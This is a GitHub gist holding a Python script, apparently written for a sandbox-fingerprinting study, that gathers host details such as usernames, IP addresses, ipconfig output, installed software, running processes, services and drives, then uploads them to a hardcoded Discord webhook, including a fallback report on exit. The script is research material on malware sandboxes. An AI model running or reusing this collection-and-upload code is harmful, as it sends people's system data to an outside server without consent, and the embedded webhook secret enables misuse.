-
-
Save benheise/f37eca902c00984f24e0352c6f2cfa49 to your computer and use it in GitHub Desktop.
The python code used to take the environment data from sandboxes and send them to discord server.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
################################################################################# | |
# # | |
# Refer to this blog post about what this code is used for: # | |
# https://albocoder.github.io/malware/2021/06/01/SandboxStudy.html # | |
# # | |
################################################################################# | |
import requests | |
import os | |
import psutil | |
import platform | |
import subprocess | |
import socket | |
from discord_webhook import DiscordWebhook | |
import getpass | |
import json | |
from uuid import getnode as get_mac | |
from collections import namedtuple | |
from ctypes import byref, create_unicode_buffer, windll | |
from ctypes.wintypes import DWORD | |
from itertools import count | |
from datetime import datetime | |
import atexit | |
import cpuinfo # pip install py-cpuinfo | |
import time | |
startTime = datetime.now() | |
########################################################################################################## | |
# defined at http://msdn.microsoft.com/en-us/library/aa370101(v=VS.85).aspx | |
UID_BUFFER_SIZE = 39 | |
PROPERTY_BUFFER_SIZE = 256 | |
ERROR_MORE_DATA = 234 | |
ERROR_INVALID_PARAMETER = 87 | |
ERROR_SUCCESS = 0 | |
ERROR_NO_MORE_ITEMS = 259 | |
ERROR_UNKNOWN_PRODUCT = 1605 | |
# diff propoerties of a product, not all products have all properties | |
PRODUCT_PROPERTIES = [u'Language', | |
u'ProductName', | |
u'PackageCode', | |
u'Transforms', | |
u'AssignmentType', | |
u'PackageName', | |
u'InstalledProductName', | |
u'VersionString', | |
u'RegCompany', | |
u'RegOwner', | |
u'ProductID', | |
u'ProductIcon', | |
u'InstallLocation', | |
u'InstallSource', | |
u'InstallDate', | |
u'Publisher', | |
u'LocalPackage', | |
u'HelpLink', | |
u'HelpTelephone', | |
u'URLInfoAbout', | |
u'URLUpdateInfo',] | |
REPORT_FILENAME = 'report_VMP.json' | |
# class to be used for python users :) | |
Product = namedtuple('Product', PRODUCT_PROPERTIES) | |
def get_property_for_product(product, property, buf_size=PROPERTY_BUFFER_SIZE): | |
property_buffer = create_unicode_buffer(buf_size) | |
size = DWORD(buf_size) | |
result = windll.msi.MsiGetProductInfoW(product, property, property_buffer, | |
byref(size)) | |
if result == ERROR_MORE_DATA: | |
return get_property_for_product(product, property, | |
2 * buf_size) | |
elif result == ERROR_SUCCESS: | |
return property_buffer.value | |
else: | |
return None | |
def populate_product(uid): | |
properties = [] | |
for property in PRODUCT_PROPERTIES: | |
properties.append(get_property_for_product(uid, property)) | |
return Product(*properties) | |
def get_installed_products_uids(): | |
products = [] | |
for i in count(0): | |
uid_buffer = create_unicode_buffer(UID_BUFFER_SIZE) | |
result = windll.msi.MsiEnumProductsW(i, uid_buffer) | |
if result == ERROR_NO_MORE_ITEMS: | |
# done interating over the collection | |
break | |
products.append(uid_buffer.value) | |
return products | |
def get_installed_products(): | |
products = [] | |
for puid in get_installed_products_uids(): | |
products.append(populate_product(puid)) | |
return products | |
def is_product_installed_uid(uid): | |
buf_size = 256 | |
uid_buffer = create_unicode_buffer(uid) | |
property = u'VersionString' | |
property_buffer = create_unicode_buffer(buf_size) | |
size = DWORD(buf_size) | |
result = windll.msi.MsiGetProductInfoW(uid_buffer, property, property_buffer, | |
byref(size)) | |
if result == ERROR_UNKNOWN_PRODUCT: | |
return False | |
else: | |
return True | |
def report_not_sent(): | |
if not report_sent: | |
try: | |
webhook = DiscordWebhook(url='https://discordapp.com/api/webhooks/689228907437621249/Ca3xTRJU_-D6t4WQTSo1JOQM8Z0aPOywQWlzUq4gmdIXRq4rBuaXTBjqodBinxLCbKMU') | |
outip = requests.get('https://api.ipify.org').text | |
results = { | |
"platform_system":platform.platform(), | |
"platform_name":platform.node(), | |
"platform_arch":platform.architecture(), | |
"cpu_name":platform.processor(), | |
"cpu_info":cpuinfo.get_cpu_info(), | |
"num_cores":int(psutil.cpu_count()), | |
"actor_pid":os.getpid(), | |
"actor_login_username":os.getlogin(), | |
"actor_username":username, | |
"platform_path_env":os.get_exec_path(), | |
"actor_working_dir":os.getcwd(), | |
"machine_ip":requests.get('https://api.ipify.org').text, | |
"machine_boot_time":psutil.boot_time(), | |
"machine_local_time_epoch":str(time.time()), | |
"machine_local_time":str(datetime.now()), | |
"machine_ip":outip, | |
"machine_cpu_util_ratios":psutil.cpu_times_percent(), | |
"machine_cpu_stats":psutil.cpu_stats(), | |
"machine_cpu_percent":psutil.cpu_percent(), | |
"machine_net_addrs":psutil.net_if_addrs(), | |
"machine_disk_partitions":psutil.disk_partitions(), | |
"machine_disk_stats":psutil.disk_io_counters(), | |
"internet_time":requests.get('http://just-the-time.appspot.com/').text.strip(), | |
"cpuinfo":cpuinfo.get_cpu_info() | |
} | |
results['script_runtime'] = str(datetime.now() - startTime) | |
with open('nice_sandbox.bro','w') as fin: | |
json.dump(results,fin) | |
with open("nice_sandbox.bro", "r") as f: | |
webhook.add_file(file=f.read(), filename=REPORT_FILENAME) | |
# print(results) | |
webhook.execute() | |
except: | |
webhook = DiscordWebhook(url='https://discordapp.com/api/webhooks/689228907437621249/Ca3xTRJU_-D6t4WQTSo1JOQM8Z0aPOywQWlzUq4gmdIXRq4rBuaXTBjqodBinxLCbKMU') | |
webhook.content = "Failed execution for ip: %s (%s)" % (str(requests.get('https://api.ipify.org').text),str(platform.platform())) | |
webhook.execute() | |
########################################################################################################## | |
webhook = DiscordWebhook(url='https://discordapp.com/api/webhooks/689228907437621249/Ca3xTRJU_-D6t4WQTSo1JOQM8Z0aPOywQWlzUq4gmdIXRq4rBuaXTBjqodBinxLCbKMU') | |
report_sent = False | |
if __name__ == '__main__': | |
atexit.register(report_not_sent) | |
if platform.system() == "Windows": | |
ip = subprocess.check_output(["ipconfig"],encoding='utf8').strip() | |
import win32api | |
drives = win32api.GetLogicalDriveStrings() | |
drives = drives.split('\000')[:-1] | |
apps=get_installed_products() | |
else: | |
ip = subprocess.check_output(["ifconfig"],encoding='utf8').strip() | |
drives = ["IDK-about-linux"] | |
apps = ['IDK-about-linux'] | |
username = getpass.getuser() | |
outip = requests.get('https://api.ipify.org').text | |
results = { | |
"platform_system":platform.platform(), | |
"platform_name":platform.node(), | |
"platform_arch":platform.architecture(), | |
"cpu_name":platform.processor(), | |
"cpu_info":cpuinfo.get_cpu_info(), | |
"num_cores":int(psutil.cpu_count()), | |
"actor_pid":os.getpid(), | |
"actor_login_username":os.getlogin(), | |
"actor_username":username, | |
"actor_working_dir":os.getcwd(), | |
"platform_path_env":os.get_exec_path(), | |
"installed_sw":apps, | |
"platform_ipconfig":str(ip), | |
"machine_ip":outip, | |
"cpu_stats":list([psutil.cpu_stats().ctx_switches,psutil.cpu_stats().interrupts, psutil.cpu_stats().soft_interrupts, psutil.cpu_stats().syscalls]), | |
"machine_cpu_util_ratios":psutil.cpu_times_percent(), | |
"machine_cpu_stats":psutil.cpu_stats(), | |
"machine_cpu_percent":psutil.cpu_percent(), | |
"machine_net_addrs":psutil.net_if_addrs(), | |
"machine_disk_partitions":psutil.disk_partitions(), | |
"machine_disk_stats":psutil.disk_io_counters(), | |
"machine_disk0_usage":psutil.disk_usage(psutil.disk_partitions()[0].mountpoint), | |
"machine_memory":psutil.virtual_memory(), | |
"machine_battery":psutil.sensors_battery(), | |
"machine_swap_memory":psutil.swap_memory(), | |
"running_services":[s.as_dict() for s in psutil.win_service_iter()], | |
"running_processes":[s.as_dict() for s in psutil.process_iter()], | |
"machine_boot_time":psutil.boot_time(), | |
"machine_local_time_epoch":str(time.time()), | |
"machine_local_time":str(datetime.now()), | |
"internet_time":requests.get('http://just-the-time.appspot.com/').text.strip(), | |
"machine_drives":drives, | |
"cpuinfo":cpuinfo.get_cpu_info() | |
} | |
results['script_runtime'] = str(datetime.now() - startTime) | |
with open('nice_sandbox.bro','w') as fin: | |
json.dump(results,fin) | |
with open("nice_sandbox.bro", "r") as f: | |
webhook.add_file(file=f.read(), filename=REPORT_FILENAME) | |
# print(results) | |
webhook.execute() | |
report_sent = True | |
os.remove('nice_sandbox.bro') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment